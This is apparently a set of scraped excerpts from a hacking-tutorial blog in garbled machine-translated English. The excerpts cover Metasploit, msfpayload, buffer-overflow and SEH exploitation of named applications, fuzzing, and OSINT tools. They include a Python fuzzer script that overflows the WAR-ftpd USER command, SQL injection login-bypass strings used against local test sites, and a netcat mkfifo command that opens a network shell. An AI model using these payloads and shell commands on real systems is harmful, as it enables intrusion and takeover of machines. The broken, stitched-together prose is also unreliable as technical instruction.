SCX010C076

since my last post was the same as one of his students . I try to use another auxiliary ie tcp portscan just go and select a metasploit auxiliary tcp portscan setting all the options as shown below

here I try to visualize what we can do with beef ,  

We just discussed about how the use of auxiliary in metasploit. auxiliary which is part of metasploit . need not linger long , open the console and type the command msfconsole

What Exactly Is Social Engineering?   Actual social engineering technique is not nothing but a deceptive techniques is another human being. The goal is to get something he wanted. Not only in the form of money or property only, but many of Things Such as information, power, victory, and more. Social engineering activity in the IT world can not be separated from human manipulation interact the computer by using a combination of Various techniques Such as spy, steal, lie, distort facts, and more. Attackers using social engineering usually do not need a set of advanced tools or software can solve difficult, That codes. Required in the process is the understanding of this attack is psychological condition of the target, and of course also Eloquence.

Msfpayload is one of the tools included with the Metasploit Framework . It can be used to the make the payload . Adjusted for the period , first select one of the many charges Including the core framework. Then give the parameters for the charge and the output format you want, so it can be said of this tool is to generate a custom payload we want . You can take the file generated in the exploitation of its own and is written in C , Ruby , Perl , Java or other languages ​​. msfpayload also has the ability to create executable programs . It is used by who Attackers want to get full access to the target machine . It is also useful for who attackers want to use the charge Meterpreter , IDS and forensic examples of the use of:  

Meet again , do not ever get bored with me yeah ? on my post this time , will explain how we exploit linux , to stack overflow . just open a terminal and type as shown below .

This time I will be demonstrating the exploitation of SEH another application is file sharing wizard , just download the application here . still like the previous post , I use OllyDbg as the media to see the processes that occur therein . before we look for vulnerability to sniffing tools , wireshark , is carried out to find loopholes that will be our exploitation . I need not explain how to use wireshark ,

I'll see you again :) The next is to learn about the exploitation of SEH, which I practice today is to use a direct return just to try it. this is a big application server that will be our ant exploitation, OllyDbg is open on the application, and attachkan prosess antServer, our next step is to make the application to crash, with a script / fuzzer follows.

For the umpteenth time that I would ruin a music player application :) just please download the application here vuplayer. we try to find any information on this application, it turns out there feature to enter the playlist, enter a url and so on, we try to load playlist. pls with the file that we will create the perl language, just huddled over a script like this  

yess, this time I will demonstrate how to exploit rm-mp3 converter just in the discussion. The first thing we do is find an exploit on exploit-db,

After I explore more deeply , and get input from our friends , it turns out that my input payload there is little problem , for more details, just write the code below.     then run the script and do the telnet python fuzzer

Most incoming tutorial we wait , the exploitation of WAR - ftpd . We just into the discussion, for the exploitation of this application using the method previously fuzzing first copy the script below. #!/usr/bin/python import socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) buffer="\x41"*1000 s.connect(('192.168.56.101',21)) data=s.recv(1024) print("sending dummy data to USER.") s.send('USER '+buffer+'\r\n') data=s.recv(1024) s.send('PASS PASSWORD '+'\r\n') s.close() print("Okayy..!") script above is the weapon we will use later, scrip is written using python language. save with the name fuzzer.py

H ow to install the WAR - ftpd? here I will explain how to install the WAR - ftpd exploits that we will later :) just follow the steps in the picture:

Registers are memory size is very small with very high- speed access . Registers used to store data and instructions are being processed , while that data and other instructions waiting to be processed are stored in main memory . we see the following register memory EAX , EBX , ECX and EDX are called "General Purpose Register" . These registers are 32- bit register , if you melkukan cracking a 16- bit program that involved the Register is AX , BX , CX and DX . and this register can be broken - broken . further  

As in the previous tutorial , OllyDbg is a debugger program which is quite popular among the search / cracker serial number :) Just listened to the explanation immediately . we try to directly attach the file which we will exploit warftpd :) attach a position to do while running the application warftpd , to open himself made directly to the file . exe  

OllyDbg is a software or tool which is used to download the debug an application , typically used to crack serial number :) This software can be downloaded for free on the official website . This software is only about +- 1mb only, so it is very lightly used . Use of Olly debugger is also very easy , no need to install , because the program . Exe straight road . just move or send Olly debugger into virtual xp . extract files to the drive before you search program OllyDbg click 2 times .

Fuzzing What the heck is fuzzing ? Fuzzing is one of the methods of finding bugs in applications. With fuzzing method , an attacker trying to send data2 are not concrete in the hope that application will experience a crash or failure in the operation . When an application crashes , then an attacker can exploit these loopholes to control the victim computer .

TOR Project Tor protects you by bouncing your communications in a distributed network of relays run by volunteers all over the world : it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location . Tor works with many existing applications , including web browsers , instant messaging clients , remote login , and other applications based on TCP protocol . Tor is free software and open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy , confidential business activities and relationships , and state security known as traffic analysis .

What is maltego ? Maltego are tools for OSINT (Open Source Intelligence Gathering ) , so OSINT is a method of searching the information available to the public and then analyzed and used for certain purposes maltego also an open- source intelligence and forensics application . This allows for the mining and gathering information and presenting this information in a meaningful way .

Almost an hour just work especial bypass , and I found also , just enter the url   http://127.0.0.1/fbip/   fill in the username with the query :   'Or 0 = 0 #

Still the spirit of course , we will try SQL injection technique this time , to the target itself is http://127.0.0.1/dvwa our first try with a standard query ' or'1 = 1

Google hacking occurs when someone adds a further or more operators in the Google search engine to find a specific string of text in the search results . one can find the address or anything with more specific How to check Google hacking vulnerabilities The easiest way to check if your web site & applications have vulnerabilities hackers Google , is to use a Web Vulnerability Scanner . A Web Vulnerability Scanner scans your entire Web site and automatically checks for pages identified by Google hacking queries . ( Note: Web vulnerability scanner you should be able to launch queries Google hack ).

On the post yesterday, I will discuss mkfifo , this was done because the ubuntu -e parameter can not walk , was caused by a version of the traditional NC :) just enter the terminal on previous ubuntu create a file with the name of the folder test oye . And then execute it with command :   sh test / oye | nc - l 1000 > test / oye  

Shodan is a search engine that gives information about the service that runs on all devices connected to the internet either include a router , server or computer with public IP addresses . There we can get various information we need here we will try to find information about:   http://www.state.gov/

This time I want to update the blog before, which is about NC . After hearing about the explanation of the NC , NC turns on ubuntu is open BSD , so it can not, we will discuss about the BSD open later :) For that we send to the computer ubuntu NC . I will try to apply in this post what has been described . We just open a terminal on the target computer , here I use ubuntu as a target . Bactrack open terminal , then look for where NC is by typing the command: whereis nc